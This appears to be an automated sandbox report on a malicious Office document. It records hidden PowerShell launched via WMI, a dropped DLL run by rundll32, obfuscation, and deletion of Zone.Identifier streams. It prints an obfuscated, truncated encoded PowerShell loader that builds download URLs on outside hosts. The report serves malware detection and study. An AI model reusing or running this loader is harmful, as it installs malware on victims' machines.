Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM Jump to behavior
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM Jump to behavior
PE file contains an invalid checksum
Source: J70H.dll.5.dr Static PE information: real checksum: 0x60901 should be: 0x5b1fb
PE file contains sections with non-standard names
Source: J70H.dll.5.dr Static PE information: section name: .text4
Source: J70H.dll.5.dr Static PE information: section name: .text5
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001698 push ebp; retf 7_2_1000169A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001113 push esp; ret 7_2_10001131
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0019E8D0 push edx; ret 7_2_0019E9D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018388E push esi; retf 7_2_001838BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00183A42 push ebx; retf 7_2_00183A44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00183272 push edi; ret 7_2_00183273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00184BAB push ebp; iretd 7_2_00184BB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001823D7 push cs; iretd 7_2_001823D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0018E8D0 push edx; ret 8_2_0018E9D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0017388E push esi; retf 8_2_001738BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00173A42 push ebx; retf 8_2_00173A44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00173272 push edi; ret 8_2_00173273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00174BAB push ebp; iretd 8_2_00174BB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001723D7 push cs; iretd 8_2_001723D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018E8D0 push edx; ret 9_2_0018E9D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017388E push esi; retf 9_2_001738BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00173A42 push ebx; retf 9_2_00173A44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00173272 push edi; ret 9_2_00173273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00174BAB push ebp; iretd 9_2_00174BB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001723D7 push cs; iretd 9_2_001723D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0019E8D0 push edx; ret 10_2_0019E9D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0018388E push esi; retf 10_2_001838BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00183A42 push ebx; retf 10_2_00183A44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00183272 push edi; ret 10_2_00183273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00184BAB push ebp; iretd 10_2_00184BB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001823D7 push cs; iretd 10_2_001823D8

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Aanys\cokk.vuq:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
